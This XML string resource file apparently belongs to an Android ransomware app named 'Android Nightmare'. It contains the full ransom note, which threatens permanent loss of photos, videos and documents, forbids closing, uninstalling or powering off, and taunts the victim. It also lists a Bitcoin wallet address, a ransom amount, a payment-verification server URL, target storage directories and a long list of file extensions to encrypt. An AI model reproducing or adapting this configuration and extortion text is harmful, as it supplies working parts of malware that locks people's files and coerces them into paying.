<?xml version="1.0" encoding="utf-8"?>
<resources>
	<string name="app_name">Android Nightmare</string>
	<string name="pwned_message">YOU GOT PWNED</string>
	<string name="encrypted_log_message">Total files locked with encryption</string>
	<string name="warning">WARNING,\nYour data has been encrypted, all your personal videos, photos, documents and files have been LOCKED with encryption !\nDO NOT,\n• Close This Screen\n• Uninstall This Application.\n• Power Off This Device.\n• Disconnect Internet Access.\n\nThe one-time decryption key will be deleted if you do not follow these instructions, your files will be LOST FOREVER.\n\nDO,\n• Plug In Your Charger To Stop Any Accidents\n• Pay As Soon As Possible.</string>
	<string name="splash_message">DO NOT CLOSE this app until finished, NOT following these instructions will DAMAGE your storage device.\n\nWe take no responsibility if you do not follow these instructions.</string>
	<string name="decryption_impossible_notice">DECRYPTION IMPOSSIBLE</string>
	<string name="decryption_impossible_message">You have closed or reinstalled the application, your unique session key was removed and decryption is now impossible.</string>
	<string name="splash_encrypt_message">Installing\nlog : installing file,  </string>
	<string name="encryption_extension">nightmare</string>
	<string name="log_decrypted_file_message">Decrypted File</string>
	<string name="permission_denied_message">Failed to install files,\nno permission to install assets\n\nclosing in 5 seconds.</string>
	<string name="internet_denied_message">Failed to install files,\ncan not download needed assets\n\nclosing in 5 seconds</string>
	<string name="verify_payment_button_text">VERIFYING PAYMENT</string>
	<string name="log_payment_successful">Verification of payment confirmed</string>
	<string name="decrypting_button_text">DECRYPTING FILES</string>
	<string name="log_decrypting_finished_message">FILES RESTORED</string>
	<string name="transaction_pending_button_text">TRY AGAIN</string>
	<string name="transaction_pending_log_message">Verification failed due to transaction still pending.</string>
	<string name="transaction_incorrect_button_text">TRY AGAIN</string>
	<string name="transaction_incorrect_log_message">Verification failed due to incorrect payment amount or incorrect Tx ID.</string>
	<string name="transaction_server_connection_failure_log_message">Verification failed due to internet access failure.</string>
	<string name="decrypting_files_started_log_message">DECRYPTING FILES NOW</string>
	<string name="decrypting_files_finished_log_message">DECRYPTED FILES OK</string>
	<string name="decrypting_finished_button_text">FILES RESTORED</string>
	<string name="tried_to_use_back_button_message">NICE TRY,\nExiting app will LOCK your files forever</string>
	<string name="app_closed_key_destroyed_message">YOU TOOK THE HARD WAY OUT\n\nBAD LUCK</string>
	<string name="return_to_the_app_message">RETURN TO THE APP FOOL\nExiting app will LOCK your files forever, decryption will be impossible.</string>
	<string name="payment_server_https_url">https://btctrans.herokuapp.com</string>
	<string name="wallet_type">฿ Bitcoin Wallet Address</string>
	<string name="ransom_amount">1000</string>
	<string name="wallet_address">15knn9nNy7uzgC3nsaupUYB5n3PYXmtnDy</string>
	<string name="demo_txid">62f1085c06aa841bcca8c3ade28c64429c83204a56bf072cd3ed76e22c1495be</string>
	<string name="testing">no</string>
	<string name="step1">Immediately send exactly ฿ 1,000 Satoshi\n(Bitcoin currency)\nto the following wallet address,</string>
	<string name="step2">Enter your transaction id "TxID" to decrypt your files</string>
	<string-array name="directories">
		<item>Pictures</item>
		<item>Download</item>
		<item>DCIM</item>
		<item>Music</item>
		<item>Documents</item>
		<item>Android</item>
	</string-array>
	<string-array name="extensions">
		<item>jpg</item>
		<item>jpeg</item>
		<item>JPEG</item>
		<item>JPG</item>
		<item>gif</item>
		<item>GIF</item>
		<item>ico</item>
		<item>ICO</item>
		<item>apk</item>
		<item>pdf</item>
		<item>PDF</item>
		<item>xml</item>
		<item>XML</item>
		<item>mp4</item>
		<item>MP4</item>
		<item>mpeg</item>
		<item>MPEG</item>
		<item>3gp</item>
		<item>3GP</item>
		<item>3g2</item>
		<item>3G2</item>
		<item>flv</item>
		<item>FLV</item>
		<item>h264</item>
		<item>H264</item>
		<item>mkv</item>
		<item>MKV</item>
		<item>m4a</item>
		<item>M4A</item>
		<item>wmv</item>
		<item>WMV</item>
		<item>avi</item>
		<item>AVI</item>
		<item>rm</item>
		<item>RM</item>
		<item>m4v</item>
		<item>M4V</item>
		<item>swf</item>
		<item>SWF</item>
		<item>rtf</item>
		<item>RTF</item>
		<item>pdf</item>
		<item>PDF</item>
		<item>AVI</item>
		<item>avi</item>
		<item>wav</item>
		<item>WAV</item>
		<item>mp3</item>
		<item>MP3</item>
		<item>png</item>
		<item>PNG</item>
		<item>zip</item>
		<item>rar</item>
		<item>tar</item>
		<item>ZIP</item>
		<item>RAR</item>
		<item>TAR</item>
		<item>7z</item>
		<item>tar.gz</item>
		<item>csv</item>
		<item>CSV</item>
		<item>txt</item>
		<item>doc</item>
		<item>DOC</item>
		<item>wpd</item>
		<item>WPD</item>
		<item>TXT</item>
		<item>docx</item>
		<item>DOCX</item>
		<item>bin</item>
		<item>dmg</item>
		<item>iso</item>
		<item>BIN</item>
		<item>DMG</item>
		<item>ISO</item>
		<item>db</item>
		<item>DB</item>
		<item>dbf</item>
		<item>DBF</item>
		<item>dat</item>
		<item>DAT</item>
		<item>log</item>
		<item>LOG</item>
		<item>sav</item>
		<item>SAV</item>
		<item>obb</item>
		<item>OBB</item>
		<item>sql</item>
		<item>SQL</item>
		<item>vcf</item>
		<item>VCF</item>
		<item>bat</item>
		<item>BAT</item>
		<item>php</item>
		<item>PHP</item>
		<item>html</item>
		<item>HTML</item>
		<item>sh</item>
		<item>py</item>
		<item>vb</item>
		<item>SH</item>
		<item>PY</item>
		<item>VB</item>
		<item>vbs</item>
		<item>VBS</item>
		<item>ods</item>
		<item>ODS</item>
		<item>xls</item>
		<item>XLS</item>
		<item>xlsx</item>
		<item>XLSX</item>
		<item>xlsm</item>
		<item>XLSM</item>
		<item>bak</item>
		<item>BAK</item>
		<item>cfg</item>
		<item>CFG</item>
		<item>tmp</item>
		<item>TMP</item>
		<item>dmp</item>
		<item>DMP</item>
	</string-array>

</resources>
